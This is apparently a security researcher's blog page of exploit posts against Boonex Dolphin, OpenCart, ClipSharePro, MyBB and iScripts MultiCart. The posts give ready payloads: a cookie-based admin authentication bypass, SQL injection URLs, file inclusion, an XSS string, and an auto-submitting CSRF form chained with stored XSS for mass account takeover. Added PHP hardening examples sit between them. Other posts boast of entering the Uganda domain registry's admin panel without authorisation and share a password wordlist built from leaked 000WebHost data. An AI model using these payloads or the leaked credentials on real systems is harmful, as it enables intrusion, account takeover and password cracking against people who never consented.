Boonex Dolphin all versions <= 7.3 Authentication Bypass

Posted by Saadi On Wednesday 26 October 2016 3 comments
# Exploit Title     : Boonex Dolphin all versions <= 7.3 Authentication Bypass
# Exploit Author    : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link     : https://www.boonex.com
# Author HomePage   : http://security-geeks.blogspot.com
  
 
Proof of Concept

File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)

$passwd is taken straight from the Cookie parameter memberPassword.

Bug:
strcmp() compares two strings. If one argument is not a string at all, PHP 5.x and 7.x do not abort: strcmp() emits a warning and returns NULL, and NULL != 0 evaluates to false, so the "wrong password" branch above is never taken. PHP builds an array from a cookie whose name ends in [], so the client controls the type of $passwd, not just its value.

So the simple bypass is to put two cookies in the browser:
memberID=1
memberPassword[]=blah --->array

With these cookies the attacker is treated as member 1 without knowing the password and can enter the admin panel as well. On PHP 8 strcmp() throws a TypeError for a non-string argument instead of returning NULL, so the trick only works on the PHP 5/7 builds Dolphin 7.3 ran on.
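The check above reduced to a stand-alone script, beside a hardened version, as an added example (this is not Dolphin's code). The stored value is simulated with sha1() of a constructed password; Dolphin's real password storage format is not assumed here.

```php
<?php
// Added example, not Dolphin's code: why strcmp() against a cookie that
// arrives as an array lets the admin.inc.php check pass on PHP 5.x/7.x.

// Vulnerable shape of the check: the stored value is compared with whatever
// PHP parsed out of the Cookie header, with no type check at all.
function loginCheckVulnerable(string $storedHash, $passwdFromCookie): bool
{
    // On PHP < 8, strcmp() with a non-string argument emits a warning and
    // returns NULL. NULL != 0 is false, so the failure branch is skipped.
    // On PHP 8 the same call throws a TypeError instead.
    if (@strcmp($storedHash, $passwdFromCookie) != 0) {
        return false;   // wrong password
    }
    return true;        // authenticated
}

// Hardened shape: refuse anything that is not a non-empty string, then
// compare in constant time with hash_equals().
function loginCheckFixed(string $storedHash, $passwdFromCookie): bool
{
    if (!is_string($passwdFromCookie) || $passwdFromCookie === '') {
        return false;
    }
    return hash_equals($storedHash, $passwdFromCookie);
}

// Constructed values: a stored hash (format assumed) and the two cookie
// shapes a client can send.
$storedHash   = sha1('correct horse battery staple');
$scalarCookie = 'blah';      // memberPassword=blah
$arrayCookie  = ['blah'];    // memberPassword[]=blah

var_dump(loginCheckVulnerable($storedHash, $scalarCookie));
var_dump(loginCheckVulnerable($storedHash, $arrayCookie));
var_dump(loginCheckFixed($storedHash, $scalarCookie));
var_dump(loginCheckFixed($storedHash, $arrayCookie));
```

On PHP 5.x/7.x loginCheckVulnerable() rejects the scalar cookie but accepts the array one; on PHP 8 the array call throws, which is why the bypass is version dependent. loginCheckFixed() fails closed on both, and hash_equals() also removes the timing side channel of strcmp().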
  
#Independent Pakistani Security Researcher

Hack Diaries - Pwning TLD Uganda

Posted by Saadi On Friday 8 July 2016 1 comments
Hi, after a long time... today I am going to show you a POC for pwning the TLD .ug, which I did some 3-4 years back.
Years back the interface of the registry was http://old.registry.co.ug/ and the "Domain Manager Panel" sub-domain was not exposed on the TLD main domain or in search engines.
So, after doing some information gathering, e.g. port scanning, whois lookups etc., I found the domain panel, which was located at https://new.registry.co.ug:8006/

I am not going into a detailed explanation of how I do the pentest, but rather show you the main weakness, "Direct object reference".
So, after trying hard for RCE, SQLi, server vulnerability enumeration etc., I found a direct object reference to the admin panel.
To enter the domain manager as admin you just have to browse to the URL below:
https://new.registry.co.ug:8006/admin

 

There was no validation of users via sessions or any other mechanism, and I was able to see all the stuff in the admin panel, including changing the DNS of any domain such as google, MSN etc.
At that time I tried to contact them but I didn't get any response, and later in 2013 and 2015 someone hacked and changed the DNS of some domains like google.co.ug, MSN etc. When I came to know about the defacement I rechecked for the vulnerability, but this time it was patched by them (after the defacement). But it is still vulnerable to direct object reference in many other places.


Will come up with some more cool Hack Diaries - Happy Hacking ;)

000WebHost Leaked Data - Wordlist

Posted by Saadi On Tuesday 1 December 2015 0 comments
Hi, I have just extracted the passwords from the leaked 000WebHost data and made a wordlist for hash cracking :).

You can find it here

https://drive.google.com/open?id=0B_ysNAZFtakdRlg5N0pvV01jSGs

OpenCart <= 1.5.6.1 SQL Injection

Posted by Saadi On Wednesday 26 March 2014 11 comments

Hi, so today we have SQL injection in OpenCart.
I discovered this bug several months ago when I pentested OpenCart and found CSRF in it too. You can check the CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot of SQLi in it.
So here it is..

http://www.exploit-db.com/exploits/32520
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071


# Exploit Title     : OpenCart <= 1.5.6.1 SQL Injection
# Date              : 2014/3/26
# Exploit Author    : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link     : http://www.opencart.com/index.php?route=download/download
                    : https://github.com/opencart
# Software web      : www.opencart.com
# Author HomePage   : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# OpenCart suffers from multiple SQL injections in ebay.php. The bug is more about
privilege escalation, as the attacker needs an admin account with access to the openbay module.

PoC
Poorly coded file full of SQLi: opencart/system/library/ebay.php
In that file product_id is used in a SQL query without being sanitized.

public function getEbayItemId($product_id) {
    $this->log('getEbayItemId() - Product ID: '.$product_id);

    $qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
    ..............

The function is called in many locations and the parameter is passed without sanitization.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
    ...
    $item_id        = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
    ..............
where $this->request->get['product_id'] comes straight from the GET parameter.
Similarly:

public function isEbayOrder($id) {
    ...
    $qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");

In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
    ...
    if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
    ..............
More:
public function getProductStockLevel($productId, $sku = '') {
    ...
    $qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
    ..............
ebay.php has many more..
The user must have openbay module access; the token in the URL is that admin's session token.
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
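To see how the product_id concatenation shapes the query, and what the two usual fixes do to the same input, here is an added example (not OpenCart's code). The FakeDb class stands in for OpenCart's $this->db wrapper and only records the SQL it is handed; its escape() approximates the real mysqli_real_escape_string()-based method with addslashes(), an assumption made so the script runs offline.

```php
<?php
// Added example, not OpenCart's code. FakeDb only builds and records SQL.
define('DB_PREFIX', 'oc_');

class FakeDb
{
    public $log = [];
    public function query(string $sql): string { $this->log[] = $sql; return $sql; }
    // Assumption: stands in for OpenCart's mysqli-based escape().
    public function escape(string $value): string { return addslashes($value); }
}

// Vulnerable shape from ebay.php: untrusted $product_id is spliced into the query.
function getEbayItemIdVulnerable(FakeDb $db, $product_id): string
{
    return $db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '" . $product_id . "' AND `status` = '1' LIMIT 1");
}

// Fix 1: product_id is an integer key, so cast it; only leading digits survive.
function getEbayItemIdFixedCast(FakeDb $db, $product_id): string
{
    return $db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '" . (int)$product_id . "' AND `status` = '1' LIMIT 1");
}

// Fix 2: for genuinely string-valued parameters, escape before quoting so the
// attacker's quote stays inside the literal.
function getEbayItemIdFixedEscape(FakeDb $db, $product_id): string
{
    return $db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '" . $db->escape((string)$product_id) . "' AND `status` = '1' LIMIT 1");
}

$db = new FakeDb();
// Constructed attacker input, as it would arrive in ?product_id=...
$payload = "1' OR '1'='1";

echo getEbayItemIdVulnerable($db, $payload), PHP_EOL;   // quote terminates the literal, OR clause becomes SQL
echo getEbayItemIdFixedCast($db, $payload), PHP_EOL;    // (int) keeps the 1, discards the rest
echo getEbayItemIdFixedEscape($db, $payload), PHP_EOL;  // quote is escaped, payload stays data
```

The cast is the right fix for product_id and order_id, which are integer keys; escaping is the fallback for columns that legitimately hold text. Either way the change belongs inside the library function, since the page shows it being called from several controllers with raw request data.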

#Independent Pakistani Security Researcher



ClipSharePro <= 4.1 Local File Inclusion

Posted by Saadi On Saturday 8 March 2014 1 comments
http://www.exploit-db.com/exploits/32131

http://cxsecurity.com/issue/WLB-2014030063


# Exploit Title  : ClipSharePro <= 4.1 Local File Inclusion
# Date           : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Local File Inclusion

ClipSharePro is a paid YouTube clone script that suffers from a Local File Inclusion vulnerability through
which an attacker can include an arbitrary file in the web app.

LFI in ubr_link_upload.php (reachable when $MULTI_CONFIGS_ENABLED is set)
PoC code

if($MULTI_CONFIGS_ENABLED){
    if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
    else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }
// Load config file
require $config_file;  // includes the arbitrary file named in $_GET['config_file']
echo $config_file;
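The only check on config_file above is that it is non-empty, so any readable path (and, with allow_url_include on, any URL) reaches require. As an added example, not ClipSharePro's code, here is the same selection rewritten so the request can only choose from a fixed set of config files, plus a realpath() containment check for the case where a file name still has to be validated. The directory and file names are assumed.

```php
<?php
// Added example, not ClipSharePro's code: config selection without LFI.
$MULTI_CONFIGS_ENABLED = true;
$DEFAULT_CONFIG = 'config.php';
$CONFIG_DIR = __DIR__ . '/configs';            // assumed layout

// Allowlist: the request supplies a short key, never a path.
$ALLOWED_CONFIGS = [
    'default' => 'config.php',
    'mobile'  => 'config_mobile.php',
];

function selectConfigFile(array $get, bool $multiEnabled, string $default, array $allowed): ?string
{
    if (!$multiEnabled) {
        return $default;
    }
    $key = $get['config_file'] ?? '';
    // Reject arrays and any key not in the map; the lookup itself blocks
    // traversal sequences, absolute paths and wrappers such as php://.
    if (!is_string($key) || !isset($allowed[$key])) {
        return null;
    }
    return $allowed[$key];
}

// Defence in depth: resolve the final path and confirm it is still inside
// the config directory before handing it to require.
function resolveInsideDir(string $dir, string $file): ?string
{
    $base = realpath($dir);
    $path = realpath($dir . '/' . $file);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // escaped the directory
    }
    return $path;
}

$chosen = selectConfigFile($_GET, $MULTI_CONFIGS_ENABLED, $DEFAULT_CONFIG, $ALLOWED_CONFIGS);
if ($chosen === null) {
    http_response_code(400);
    exit('Unknown config_file');
}
$path = resolveInsideDir($CONFIG_DIR, $chosen);
if ($path === null) {
    http_response_code(500);
    exit('Config file missing');
}
require $path;
```

The allowlist is what actually closes the bug; the realpath() check is there so that a later change which starts accepting file names again cannot quietly reopen it.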

Mybb 1.6.12 XSS P0c

Posted by Saadi On Friday 14 February 2014 2 comments
Hi, I didn't update the blog for some time as I was busy with some other stuff, but from now on some cool stuff is coming soon which I found but didn't publish..

MyBB XSS: some days back I found an advisory for an XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/

After reading the article and reviewing the code a little, I found the same type of function was coded for searching private messages.

So I fuzzed the same input strings the author used on search.php and found private.php also vulnerable to XSS.

function privatemessage_perform_search_mysql
----in /inc/functions_search.php
called from private.php

private.php
POST parameter: keywords
Data: <script>alert(/Saadi/)</script>qor'("\2a</script>

P0c


Moreover, MyBB 1.8 alpha is also vulnerable in private.php..
So this is it for today ;)

#Independent Pakistani Security Researcher

iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

Posted by Saadi On Saturday 14 December 2013 1 comments
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScripts MultiCart is a paid shopping cart system that suffers from XSS and Cross-site request forgery vulnerabilities through which
an attacker can manipulate user data by sending the victim a maliciously crafted URL.

XSS in product reviews, so a lot of exploitation can be done, as the injected code will execute whenever the product is visited by clients.
In product_review.php line 52 --- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without sanitizing and is later rendered on the product page without encoding.

Exploitation

Go to http://site.tld/product_review.php?pid=[any product id]
Paste your XSS vector and submit.

The XSS vector will be executed here:
http://site.tld/productdetails.php?productid=1 --> the same product id for which you submitted the review.

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://localhost/profile.php" method="post">
    <input type="hidden" name="userid" value="5">
    <input type="hidden" name="txtFirstName" value="admin">
    <input type="hidden" name="txtLastName" value="admin">
    <input type="hidden" name="txtEmail" value="admin@gmail.com">
    <input type="hidden" name="txtAddress1" value="asdf">
    <input type="hidden" name="txtCity" value="saf">
    <input type="hidden" name="bill_country" value="DZ">
    <input type="hidden" name="bill_state" value="adsf">
    <input type="hidden" name="btnSaveChanges" value="Save Changes">
    <input type="submit" name="btnSaveChanges" class="button" value="Save">
</form>
</body>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change users' emails en masse; after changing the email we can change the password too via the forgot-password option, providing that email.
Just inject a CSRF iframe as the XSS vector on product_review.php
E.g.
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CSRF exploit (the form above)

So now whenever users browse the reviewed products their email will be changed automatically, without any click on their part.
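Two controls break this chain: a per-session CSRF token that the forged profile.php form cannot know, and output encoding so the stored review is displayed as text rather than run as markup. As an added example (not MultiCart's code; function and field names are assumed), here are both, exercised against the PoC inputs from this post.

```php
<?php
// Added example, not MultiCart's code: CSRF token check plus output encoding.
session_start();

// One random token per session, generated on first use.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time compare; a missing or array-valued field fails closed.
function csrfTokenValid($submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Render a stored review so <iframe>, <script>, quotes and event handlers
// stay literal text on productdetails.php.
function renderReview(string $stored): string
{
    return '<p>' . htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Hardened profile.php save handler: the hidden form in the CSRF PoC sends
// no token, so it is refused before any user data is touched. The update
// must also target the logged-in session's user, never a submitted userid.
function handleProfileSave(array $post): string
{
    if (!csrfTokenValid($post['csrf_token'] ?? null)) {
        http_response_code(403);
        return 'Rejected: missing or wrong CSRF token';
    }
    // ... apply the change to $_SESSION['sess_userid'] only ...
    return 'Profile updated';
}

// Constructed inputs: the CSRF PoC body, a legitimate submission carrying
// the session token, and the stored XSS vector from above.
$forged = ['userid' => '5', 'txtEmail' => 'admin@gmail.com'];
$legit  = $forged + ['csrf_token' => csrfToken()];
$review = '<iframe src="http://www.site.tld/inject.html"></iframe>';

echo handleProfileSave($forged), PHP_EOL;
echo handleProfileSave($legit), PHP_EOL;
echo renderReview($review), PHP_EOL;
```

The real profile form gets the token as a hidden field, e.g. `<input type="hidden" name="csrf_token" value="<?= csrfToken() ?>">`, which the attacker's page on another origin cannot read. Encoding the review on output rather than stripping tags on input is deliberate: it keeps the stored data intact and makes the protection independent of how the value got into the database.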

#Independent Pakistani Security Researcher